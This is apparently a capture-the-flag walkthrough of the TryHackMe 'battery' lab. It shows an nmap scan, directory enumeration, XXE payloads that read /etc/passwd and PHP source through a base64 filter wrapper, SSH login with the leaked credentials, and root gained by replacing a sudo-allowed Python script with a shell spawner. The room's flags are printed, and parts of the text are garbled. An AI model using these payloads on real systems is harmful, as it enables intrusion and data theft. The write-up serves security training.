Tryhackme — battery
NMAP -network mapper
# nmap -sT -vv -sC -sV 10.10.21.189
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 14:6b:67:4c:1e:89:eb:cd:47:a2:40:6f:5f:5c:8c:c2 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPe2PVDHBBlUCEtHNVxjToY/muZpZ4hrISDM7fuGOkh/Lp9gAwpEh24Y/u197WBDTihDJsDZJqrJEJSWbpiZgReyh1LtJTt3ag8GrUUDJCNx6lLUIWR5iukdpF7A2EvV4gFn7PqbmJmeeQRtB+vZJSp6VcjEG0wYOcRw2Z6N6ho3AAAAFQCg45+RiUGvOP0QLD6PPtrMfuzdQQAAAIEAxCPXZB4BiX72mJkKcVJPkqBkL3t+KkkbDCtICWi3d88rOqPAD3yRTKEsASHqSYfs6PrKBd50tVYgeL+ss9bP8liojOI7nP0WQzY2Zz+lfPa+d0uzGPcUk0Wg3EyLLrZXipUg0zhPjcXtxW9+/H1YlnIFoz8i/WWJCVaUTIR3JOoAAACBAMJ7OenvwoThUw9ynqpSoTPKYzYlM6OozdgU9d7R4XXgFXXLXrlL0Fb+w7TT4PwCQO1xJcWp5xJHi9QmXnkTvi386RQJRJyI9l5kM3E2TRWCpMMQVHya5L6PfWKf08RYGp0r3QkQKsG1WlvMxzLCRsnaVBqCLasgcabxY7w6e2EM
| 2048 66:42:f7:91:e4:7b:c6:7e:47:17:c6:27:a7:bc:6e:73 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkDLTds2sLmn9AZ0KAl70Fu5gfx5T6MDJehrsCzWR3nIVczHLHFVP+jXDzCcB075jjXbb+6IYFOdJiqgnv6SFxk85kttdvGs/dnmJ9/btJMgqJI0agbWvMYlXrOSN26Db3ziUGrddEjTT74Z1kokg8d7uzutsfZjxxCn0q75NDfDpNNMLlstOEfMX/HtOUaLQ47IeuSpaQoUkNkHF2SGoTTpbC+avzcCNHRIZEwQ6HdA3vz1OY6TnpAk8Gu6st9XoDGblGt7xv1vyt0qUdIYaKib8ZJQyj1vb+SJx6dCljix4yDX+hbtyKn08/tRfNeRhVSIIymOTxSGzBru2mUiO5
| 256 a8:6a:92:ca:12:af:85:42:e4:9c:2b:0e:b5:fb:a8:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCYHRWUDqeSQgon8sLFyvLMQygCx01yXZR6kxiT/DnZU+3x6QmTUir0HaiwM/n3aAV7eGigds0GPBEVpmnw6iu4=
| 256 62:e4:a3:f6:c6:19:ad:30:0a:30:a1:eb:4a:d3:12:d3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILW7vyhbG1WLLhSEDM0dPxFisUrf7jXiYWNSTqw6Exri
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HERE, port 22,80 are open…
Enumeration
then we go to run gobuster and you will get all directory here..)
#gobuster dir -u http://10.10.21.189 -w /usr/share/dirb/wordlists /common.txt -x txt,php
/acc.php (Status: 200) [Size: 1104]
/admin.php (Status: 200) [Size: 663]
/admin.php (Status: 200) [Size: 663]
/dashboard.php (Status: 302) [Size: 908] [ → admin.php]
/forms.php (Status: 200) [Size: 2334]
/index.html (Status: 200) [Size: 406]
/logout.php (Status: 302) [Size: 0] [ → admin.php]
/register.php (Status: 200) [Size: 715]
/report (Status: 200) [Size: 16912]
/scripts (Status: 301) [Size: 313] [ → http://10.10.21.189/scripts/]
/server-status (Status: 403) [Size: 292]
/with.php (Status: 302) [Size: 1259] [ → admin.php]
lets,check .. /register.php
let’s,try to login ..
Here is the dashboard view..
FILE
we can’t access the my account and command menu though. Let’s try to check the /report file.
let’s command on terminal …
#strings report
support@bank.a
contact@bank.a
cyber@bank.a
admins@bank.a
sam@bank.a
admin0@bank.a
super_user@bank.a
control_admin@bank.a
it_admin@bank.a
Welcome To ABC DEF Bank Managemet System!
let’s check …command page..
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>
aaa
</name>
<search>
test
</search>
</root>
then, we use xml payload check here — https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>
<root>
<name>
aaa
</name>
<search>
test
</search>
</root>
Here, i try to read the /acc.php source code.
<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/register.php" >you can see here this type of encoder..
let’s,try hash for encoding will get for password.
#echo "base64EncodedString" | base64 -d >> output.php
session_start();
if(isset($_SESSION['favcolor']) and $_SESSION['favcolor']==="admin@bank.a")
{echo "<h3 style='text-align:center;'>Weclome to Account control panel</h3>";
echo "<form method='POST'>";
echo "<input type='text' placeholder='Account number' name='acno'>";
echo "<br><br><br>";
echo "<input type='text' placeholder='Message' name='msg'>";
echo "<input type='submit' value='Send' name='btn'>";
echo "</form>";
//MY CREDS :- cyber:super#secure&password!
User flag1.txt
# ssh cyber@10.10.133.60
cyber@ubuntu:~$ id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
cyber@ubuntu:~$ ls
flag1.txt run.py
cyber@ubuntu:~$ cat flag1.txt
THM{6f7e4dd134e19af144c88e4fe46c67ea}
Privilege escalation
try, #sudo -l
cyber@ubuntu:~$ sudo -l
Matching Defaults entries for cyber on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cyber may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py
We can run /usr/bin/python3 /home/cyber/run.py as rootcyber@ubuntu:~$ mv run.py run2
cyber@ubuntu:~$ ls
flag1.txt run2
cyber@ubuntu:~$ echo 'import os; os.system("/bin/sh")' > run.py
cyber@ubuntu:~$ chmod +x run.py
cyber@ubuntu:~$ sudo /usr/bin/python3 /home/cyber/run.py
# whoami
root
# cd /root
# cat root.txtTHM{db12b4451d5e70e2a177880ecfe3428d}
Flag2.txt
# cd /home
# ls
cyber yash
# cd cybr
/bin/sh: 6: cd: can't cd to cybr
# ls
cyber yash
# cd yash
# ls
emergency.py fernet flag2.txt root.txt
# cat flag2.txt
THM{20c1d18791a246001f5df7867d4e6bf5}
